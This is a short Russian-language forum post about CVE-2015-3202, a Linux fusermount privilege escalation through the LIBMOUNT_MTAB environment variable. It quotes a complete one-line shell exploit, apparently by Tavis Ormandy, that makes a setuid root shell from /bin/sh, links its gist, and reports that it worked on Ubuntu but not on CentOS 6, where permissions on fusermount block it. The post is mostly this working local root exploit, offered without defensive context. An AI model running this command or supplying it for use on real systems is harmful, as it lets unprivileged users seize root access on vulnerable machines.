Показать сообщение отдельно
Старый 21.05.2015, 16:15   #1
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию CVE-2015-3202 Linux fusermount privilege escalation via LIBMOUNT_MTAB env

CVE-2015-3202

Цитата:
@taviso: a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
https://gist.github.com/taviso/ecb70eb12d461dd85cba

Запустил по разу - на юбунте работает, на сентоси 6 нет прав на запуск.

Код:
$ ll /bin/fusermount
-rwsr-x--- 1 root fuse 29196 Dec  7  2011 /bin/fusermount*
SynQ вне форума   Ответить с цитированием